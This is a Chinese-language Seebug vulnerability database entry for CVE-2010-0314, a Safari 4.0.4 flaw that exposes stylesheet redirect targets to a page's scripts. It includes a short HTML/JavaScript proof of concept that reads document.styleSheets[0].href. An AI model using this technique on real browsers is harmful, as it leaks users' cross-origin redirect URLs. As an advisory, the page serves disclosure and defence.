Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19008
HistoryJan 27, 2010 - 12:00 a.m.

Apple Safari样式表重新定向信息泄露漏洞

2010-01-2700:00:00
Root
www.seebug.org
8

0.024 Low

EPSS

Percentile

88.6%

JSON

BUGTRAQ ID: 37925
CVE ID: CVE-2010-0314

Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。

Safari跟随了样式表的重新定向并允许读取目标URL。通过在样式表LINK元素的HREF属性中放置站点URL然后读取 document.styleSheets[0].href属性值,攻击者就可以找到重新定向的目标URL。

Apple Safari 4.0.4
厂商补丁:

Apple

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com


                                                <link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>

Related

debiancve 1
openvas 5
ubuntucve 1
cvelist 1
cve 1
prion 1
nessus 2
debiancve
debiancve
CVE-2010-0314
2010-01-14 19:30:00
openvas
openvas
Apple Safari <= 4.0.4 Multiple Vulnerabilities
2010-01-20 00:00:00
Apple Safari Multiple Vulnerabilities
2010-01-20 00:00:00
Ubuntu Update for webkit vulnerabilities USN-1006-1
2010-10-22 00:00:00
ubuntucve
ubuntucve
CVE-2010-0314
2010-01-14 00:00:00
cvelist
cvelist
CVE-2010-0314
2010-01-14 19:00:00
cve
cve
CVE-2010-0314
2010-01-14 19:30:00
prion
prion
Code injection
2010-01-14 19:30:00
nessus
nessus
Ubuntu 9.10 / 10.04 LTS / 10.10 : webkit vulnerabilities (USN-1006-1)
2010-10-20 00:00:00
Mandriva Linux Security Advisory : webkit (MDVSA-2011:039)
2011-03-03 00:00:00

0.024 Low

EPSS

Percentile

88.6%

JSON
Related for SSV:19008
debiancve1openvas5ubuntucve1cvelist1cve1prion1nessus2